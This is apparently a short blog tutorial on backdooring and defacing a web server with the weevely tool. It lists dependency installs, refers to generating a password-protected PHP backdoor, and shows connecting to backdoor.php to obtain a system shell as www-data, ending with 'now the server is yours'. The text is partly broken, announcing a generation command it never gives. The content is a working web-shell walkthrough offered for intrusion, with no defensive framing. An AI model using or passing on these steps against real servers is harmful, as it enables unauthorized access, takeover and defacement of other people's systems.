How to backdoor and deface a web server using weevely
# sudo pip install prettytable Mako pyaml dateutils pysocks –upgrade
Lets generate a password protected backdoor so that others cannot get unauthorized access to our shell. Follow the command
Executing the payload
root@khromozome:~# weevely “http://localhost/backdoor.php” password[+] weevely 3.2.0
[+] Target: www-data@khromozome:/var/www/html
[+] Session: /root/.weevely/sessions/localhost/backdoor_0.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
Tadaaaa… now the server is yours use help command for more info
You can execute system shell commands networking commans, file system commands.